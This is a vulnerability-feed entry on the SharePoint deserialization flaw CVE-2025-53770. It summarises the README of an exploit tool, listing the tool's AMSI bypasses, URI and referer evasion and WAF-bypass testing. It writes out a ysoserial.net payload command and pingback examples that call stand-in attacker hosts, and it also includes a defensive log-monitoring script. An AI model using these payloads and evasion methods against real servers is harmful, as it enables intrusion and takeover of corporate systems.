Microsoft SharePoint Server Deserialization Vulnerability

Vulnerability Information

Vulnerability name: Microsoft SharePoint Server deserialization vulnerability

Vulnerability ID:

  • CVE: CVE-2025-53770

Vulnerability type: Deserialization

Severity: Critical

Description: Affected product: Microsoft SharePoint Server is a widely used enterprise collaboration platform that supports document management, team collaboration and business process automation. It is typically deployed on internal corporate networks for collaboration between internal and external users. This vulnerability affects on-premises SharePoint Server 2016, 2019 and Subscription Edition; SharePoint Online (M365) is not affected.

Explanation: The vulnerability is an unauthenticated remote code execution (RCE) flaw in /_layouts/15/ToolPane.aspx, caused by improper deserialization of untrusted data. An attacker can craft a malicious request that executes arbitrary code on the target server. The technical root cause is that SharePoint Server fails to properly validate and sanitize input data when handling specific requests, which allows the deserialization flaw to be exploited.

Impact analysis: The vulnerability has a CVSS score of 9.8 and is rated critical. An attacker can exploit it remotely without any authentication to execute arbitrary code and take full control of the affected system, which can lead to data theft, service disruption and even lateral movement within the internal network. Because exploitation can be automated and requires no user interaction, the risk is extremely high. Microsoft released patches (e.g., KB5002768, KB5002754) on July 19, 2025 to fix the vulnerability and strongly recommends that all affected users apply them immediately. In addition, CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to complete patching by July 21, 2025.

Vendor: Microsoft

Product: SharePoint Server

Affected versions: 2016, 2019, Subscription Edition

Source: https://github.com/exfil0/CVE-2025-53770

Type: CVE-2025:github search

Repository files

  • README.md
  • divine_absolute.py
  • requirements.txt

Source overview

Divine Absolute - CVE-2025-53770 Exploit Tool


Overview

Divine Absolute is a sophisticated, wizard-driven Python exploit tool targeting CVE-2025-53770, a critical (CVSS 9.8) unauthenticated remote code execution (RCE) vulnerability in on-premises Microsoft SharePoint Server (2016, 2019, Subscription Edition). This vulnerability, disclosed as a zero-day on July 19, 2025, stems from deserialization of untrusted data in /_layouts/15/ToolPane.aspx. The tool is designed for ethical penetration testing and authorized security research only, offering unparalleled precision, stealth, and adaptability for reconnaissance, exploitation, and verification.

Repository: https://github.com/exfil0/CVE-2025-53770

⚠️ Legal Warning: This tool is for lawful, authorized use only in controlled environments with explicit permission. Unauthorized use against systems you do not own or have permission to test is illegal and may result in severe legal consequences. The author assumes no liability for misuse.

Features

  • Modes:
    • Recon: Detects SharePoint presence, version, and ToolPane.aspx accessibility with advanced scoring and regex (e.g., 16.0.0.\d+-\w+?).
    • Exploit: Delivers payloads via ToolPane.aspx with robust bypasses.
    • Full: Combines recon and exploitation, with optional aggressive exploitation.
  • Payload Generation:
    • Integrates ysoserial.net for .NET deserialization payloads (e.g., ObjectDataProvider, LosFormatter).
    • Optional pythonnet for fallback HTTP/DNS pingback payloads (e.g., WebRequest.Create, Dns.GetHostEntry).
    • Supports GZIP compression with explicit encoding/decoding and base64 validation.
    • Injects AMSI bypasses (basic reflection, obfuscated, or custom snippets) into PowerShell commands, including base64-encoded (-enc) payloads.
  • Bypasses:
    • URI evasion: Random or fixed suffixes (e.g., /xp.aspx, UUID-based).
    • Referer spoofing: None, external domains (e.g., www.google.com), custom URLs, or internal SharePoint paths (e.g., /_layouts/15/sharepoint.aspx).
  • Stealth:
    • Adaptive rate limiting with a minimum RPS floor (0.01) and burst control.
    • Thread-safe concurrency with lock-protected pacing and jitter (0-0.1s).
  • Verification:
    • Robust RCE confirmation with compiled OR regexes, retries on RequestException, and customizable status codes/paths.
  • Reconnaissance:
    • Enhanced SharePoint detection via headers (e.g., MicrosoftSharePointTeamServices), paths (e.g., /versions.aspx), and regexes.
  • Output:
    • JSON results with forensic logging for analysis.
  • Usability:
    • Interactive wizard for easy configuration.
    • Supports Mono/Wine for ysoserial.net on non-Windows systems.
    • Proxy support (HTTP/SOCKS5) and customizable timeouts.

CVE-2025-53770 Context

  • Vulnerability: Unauthenticated RCE via deserialization in /_layouts/15/ToolPane.aspx.
  • Affected: SharePoint Server 2016, 2019, Subscription Edition (EOL 2010/2013 also vulnerable).
  • Unaffected: SharePoint Online (M365).
  • Exploited: Since July 18, 2025, in campaigns like “ToolShell” by state-sponsored actors (e.g., Linen Typhoon).
  • Patches: Microsoft patches (e.g., KB5002768, KB5002754) released July 19, 2025, mitigate fully. CISA KEV listing mandates federal patching by July 21, 2025.
  • Mitigations: Patch, rotate keys post-patch, enable AMSI/Defender (Full Mode), monitor /ToolPane.aspx POSTs, use WAF rules (e.g., Cloudflare).
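As an added example (not part of the Divine Absolute repository or of the vendor guidance summarized above), the following Python script implements the "monitor /ToolPane.aspx POSTs" mitigation over IIS W3C log lines from a SharePoint front end. The log excerpt, its field order, and the IP addresses and hostnames in it are constructed for this example. The match is deliberately a case-insensitive substring match on the URI stem so that the URI-suffix evasion listed under Bypasses (e.g. a trailing /xp.aspx) is still caught, and the anonymous-request flag relies on IIS writing "-" in cs-username for unauthenticated requests.

```python
"""Flag POST requests to ToolPane.aspx in IIS W3C logs (added example; not
part of the Divine Absolute project). Sample log lines are constructed."""
import re
from collections import Counter

# Constructed sample excerpt. Column order comes from the #Fields header line,
# as IIS writes it; values never contain spaces in W3C format.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-20 08:00:01 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\alice 10.0.1.20 Mozilla/5.0 https://sharepoint.example.com/ 200
2025-07-20 08:00:03 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 - 203.0.113.7 Mozilla/5.0 - 200
2025-07-20 08:00:04 10.0.0.5 POST /_layouts/15/toolpane.aspx/xp.aspx DisplayMode=Edit 443 - 203.0.113.7 python-requests/2.31 https://www.google.com/ 200
2025-07-20 08:00:09 10.0.0.5 GET /_layouts/15/ToolPane.aspx - 443 CORP\\bob 10.0.1.21 Mozilla/5.0 https://sharepoint.example.com/_layouts/15/sharepoint.aspx 200
2025-07-20 08:01:15 10.0.0.5 POST /_vti_bin/client.svc/ProcessQuery - 443 CORP\\bob 10.0.1.21 Mozilla/5.0 https://sharepoint.example.com/ 200
"""

# Substring match: catches the plain path as well as suffixed variants such as
# /_layouts/15/ToolPane.aspx/xp.aspx used for URI evasion.
TOOLPANE_RE = re.compile(r"/toolpane\.aspx", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields header."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any header
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed record: skip rather than misalign columns
        yield dict(zip(fields, values))


def find_toolpane_posts(text):
    """Return an alert per POST whose URI stem contains ToolPane.aspx."""
    alerts = []
    for rec in parse_w3c(text):
        if rec["cs-method"].upper() != "POST":
            continue
        stem = rec["cs-uri-stem"]
        if not TOOLPANE_RE.search(stem):
            continue
        alerts.append({
            "time": f'{rec["date"]} {rec["time"]}',
            "client_ip": rec["c-ip"],
            "uri": stem,
            "query": rec["cs-uri-query"],
            "user_agent": rec["cs(User-Agent)"],
            "referer": rec["cs(Referer)"],
            "status": rec["sc-status"],
            # IIS logs "-" for anonymous requests; the flaw needs no credentials,
            # so an anonymous POST here is the highest-value signal.
            "anonymous": rec["cs-username"] == "-",
            # Anything after toolpane.aspx in the stem is suffix evasion.
            "suffix_evasion": not stem.lower().endswith("toolpane.aspx"),
        })
    return alerts


def summarize_by_client(alerts):
    """Count alerts per client IP so repeated attempts stand out."""
    return dict(Counter(a["client_ip"] for a in alerts))


if __name__ == "__main__":
    found = find_toolpane_posts(SAMPLE_LOG)
    for a in found:
        print(a)
    print("per-client:", summarize_by_client(found))
```

Feed the script real logs by passing a file's contents to find_toolpane_posts instead of SAMPLE_LOG; because the parser reads the #Fields header, additional or reordered columns in a production log are handled as long as the referenced field names are present.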

Installation

Prerequisites

  • Python 3.8+
  • Dependencies:
    pip install requests termcolor
  • Optional (for .NET serialization fallback):
    pip install pythonnet
  • ysoserial.net:
  • Mono/Wine (non-Windows systems):
    # Ubuntu/Debian
    sudo apt-get install mono-complete
    # macOS (via Homebrew)
    brew install mono
  • Docker Lab (recommended for testing):
    docker pull mcr.microsoft.com/sharepoint/server:2019

Setup

  1. Clone the repository:
    git clone https://github.com/exfil0/CVE-2025-53770.git
    cd CVE-2025-53770
  2. Install Python dependencies:
    pip install -r requirements.txt
  3. Ensure ysoserial.exe is accessible or provide its path during execution.
  4. (Optional) Verify Mono/Wine for non-Windows systems.

Usage

Run the interactive wizard:

python divine_absolute.py

Workflow

  1. Mode Selection:
    • Recon: Scans for SharePoint presence and version.
    • Exploit: Sends payload to ToolPane.aspx.
    • Full: Recon + exploit (optional aggressive mode).
  2. Target Input:
    • Single URL (e.g., https://sharepoint.example.com).
    • File with URLs (one per line).
  3. Payload Configuration:
    • ysoserial.net: Specify path, gadget (e.g., ObjectDataProvider), and command (e.g., cmd /c whoami).
    • File: Load base64 GZIP payload from file.
    • String: Input base64 GZIP payload directly.
    • Pingback: Generate HTTP/DNS pingback (e.g., http://attacker.com/callback or sub.attacker.com).
    • AMSI bypass: Choose NONE, BASIC_REFLECTION, CONCAT_OBFUSCATED, or custom snippet.
  4. Bypass Options:
    • URI: NONE, FIXED (e.g., /xp.aspx), RANDOM (UUID-based).
    • Referer: DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.
  5. Network Settings:
    • Proxy (e.g., http://127.0.0.1:8080).
    • Threads, timeout, jitter, and rate limit (RPS).
  6. RCE Verification:
    • Specify path (e.g., /sitepages/result.txt), regexes (e.g., Xanthorox.*), status codes (e.g., 200,403), attempts, delay, and timeout.

Example Commands

  • Reconnaissance:
    python divine_absolute.py
    # Select: Mode=Recon, Target=https://sharepoint.example.com
  • Exploit with ysoserial.net:
    python divine_absolute.py
    # Select: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
    # ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
    # Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
  • Full Mode with Verification:
    python divine_absolute.py
    # Select: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
    # Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
  • DNS Pingback:
    python divine_absolute.py
    # Select: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com

Output

Results are saved in xanthorox_results.json with fields:

  • target: URL tested.
  • sharepoint_detected: Boolean.
  • toolpane_accessible: Boolean.
  • exploited: Boolean (payload sent).
  • verified_rce: Boolean/None (RCE confirmed).
  • error: Any errors encountered.

Example:

[
  {
    "target": "https://sharepoint.example.com",
    "sharepoint_detected": true,
    "toolpane_accessible": true,
    "exploited": true,
    "verified_rce": true,
    "error": null
  }
]

Improvements Addressed

This version fixes:

  • Adaptive Rate Limiting: Ignores non-retry errors (e.g., 404) for success/error counts; enforces a minimum RPS floor (0.01).
  • AMSI Injection: Decodes and injects bypasses into base64-encoded PowerShell (-enc) commands; supports non-PowerShell (e.g., cmd.exe) with warnings.
  • Pingback Fallback: Uses pythonnet for reliable DNS pingback with Dns.GetHostEntry (experimental, requires gadget for full effect).

Testing Recommendations

  • Lab Setup: Use a SharePoint Server 2019 Docker container (unpatched) for safe testing.
  • WAF Testing: Validate bypasses against Cloudflare or similar WAFs with adaptive RPS.
  • Payload Testing: Generate payloads with ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 and verify DNS logs.

Known Limitations

  • Pingback Reliability: Dns.GetHostEntry in pythonnet may not trigger without a specific gadget chain.
  • Complex Commands: Non-standard PowerShell commands may require manual AMSI bypass injection.
  • WAF Detection: Some WAFs may block payloads despite bypasses; test thoroughly.

Contributing

Contributions are welcome! Please:

  1. Fork the repository.
  2. Create a feature branch (git checkout -b feature/awesome-improvement).
  3. Commit changes (git commit -m "Add awesome improvement").
  4. Push to the branch (git push origin feature/awesome-improvement).
  5. Open a pull request.

License

This project is licensed under the MIT License. See LICENSE for details.

Acknowledgments

  • xAI: For inspiring cutting-edge security research.
  • ysoserial.net Team: For the .NET deserialization payload generator.
  • Security Community: For insights into CVE-2025-53770 exploitation and mitigations.

Contact

Note: Always verify payloads and configurations in a controlled lab before use. Stay ethical, stay legal.


http://example.com/2025/07/23/github_2613193353/
Author: lianccc
Published: July 23, 2025